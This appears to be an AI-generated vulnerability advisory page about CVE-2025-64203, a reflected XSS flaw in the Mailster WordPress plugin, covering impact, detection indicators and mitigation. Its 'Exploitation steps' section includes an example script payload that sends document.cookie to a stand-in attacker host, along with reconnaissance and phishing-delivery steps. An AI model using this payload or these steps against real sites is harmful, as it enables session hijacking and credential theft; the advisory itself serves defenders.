CVE-2025-64203
WordPress vulnerability analysis and mitigation

Overview

CVE-2025-64203 is a Reflected Cross-Site Scripting (XSS) vulnerability in the EverPress Mailster WordPress plugin, classified under CWE-79. It affects all Mailster versions prior to 4.1.14 and was reported by researcher João Pedro S Alcântara (Kinorth) on September 27, 2025, with public disclosure on October 27, 2025. The CVE was formally published on December 18, 2025. It carries a CVSS v3.1 base score of 7.1 (Medium/High) (Patchstack).

Technical details

The vulnerability is rooted in improper neutralization of user-supplied input during web page generation (CWE-79), specifically a Reflected XSS flaw in the Mailster plugin for WordPress. An unauthenticated attacker can craft a malicious URL containing injected JavaScript that, when clicked by a victim (such as a logged-in administrator), causes the script to execute in the victim's browser within the context of the WordPress site. Exploitation requires no privileges on the target site but does require user interaction — the victim must follow a crafted link. No public proof-of-concept code has been identified at this time (Patchstack).

Impact

Successful exploitation allows an attacker to inject and execute arbitrary JavaScript in the browser of a victim who interacts with a malicious link, potentially leading to session hijacking, credential theft, unauthorized administrative actions, or redirection to malicious sites. Because the scope is changed (S:C in CVSS), the impact extends beyond the vulnerable component itself, affecting the broader WordPress environment and any data accessible to the victim's session. Confidentiality, integrity, and availability are all assessed as low-impact individually, but the combined effect on a WordPress site — particularly if the victim is an administrator — can be significant (Patchstack).

Exploitability

No confirmed in-the-wild exploitation has been reported for CVE-2025-64203, and it is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. The EPSS score is approximately 0.029% (0.000290), indicating a low current probability of exploitation. However, Patchstack notes that vulnerabilities of this class are commonly used in mass-exploit campaigns targeting WordPress sites at scale, regardless of site popularity (Patchstack).

Exploitation steps

  1. Reconnaissance: Identify WordPress sites running the Mailster plugin in versions prior to 4.1.14 using tools like WPScan, Shodan, or Google dorks targeting Mailster-specific page elements.
  2. Identify vulnerable parameter: Locate the specific URL parameter(s) in the Mailster plugin that reflect unsanitized user input back into the page response.
  3. Craft malicious URL: Construct a URL containing a reflected XSS payload (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>) injected into the vulnerable parameter.
  4. Deliver to victim: Send the crafted URL to a privileged WordPress user (e.g., administrator) via phishing email, social engineering, or other means.
  5. Payload execution: When the victim clicks the link and their browser loads the page, the injected script executes in their browser session, enabling cookie theft, session hijacking, or unauthorized actions on the WordPress site (Patchstack).

Indicators of compromise

  • Network: Outbound HTTP requests from victim browsers to unknown external domains shortly after loading a Mailster plugin page; unusual referrer headers in web server logs pointing to crafted URLs with encoded script tags.
  • Logs: WordPress or web server access logs showing GET/POST requests to Mailster plugin endpoints containing URL-encoded XSS payloads (e.g., %3Cscript%3E, javascript:, onerror=).
  • Browser/Session: Unexpected session invalidation or new admin accounts created without authorization following a privileged user's interaction with a suspicious link.
  • File System: New or modified WordPress admin accounts, unexpected plugin installations, or altered theme files that may indicate post-exploitation activity following session hijacking.

Mitigation and workarounds

The primary remediation is to update the Mailster plugin to version 4.1.14 or later, which contains the fix for this vulnerability. Site administrators who cannot immediately update should consider using a web application firewall (WAF) rule — Patchstack has issued a virtual patch/mitigation rule for subscribers to block exploitation attempts until the plugin is updated. Additionally, educating privileged users to avoid clicking unsolicited or suspicious links reduces the risk of successful exploitation (Patchstack).

Community reactions

The vulnerability was discovered and responsibly disclosed through Patchstack's Active Vulnerability Disclosure Program (VDP) by researcher João Pedro S Alcântara (Kinorth). Patchstack classified it as medium priority and issued a virtual patch for its users. No notable broader media coverage or significant social media discussion has been identified beyond standard vulnerability database listings (Patchstack).

Additional resources


SourceThis report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-18044NONEN/A
  • estatik
NoYesAug 12, 2026
CVE-2026-17008NONEN/A
  • quick-paypal-payments
NoNoAug 12, 2026
CVE-2026-16990NONEN/A
  • wp-paypal
NoNoAug 12, 2026
CVE-2026-16747NONEN/A
  • kirki
NoYesAug 12, 2026
CVE-2026-16621NONEN/A
  • woo-paypal-gateway
NoYesAug 12, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management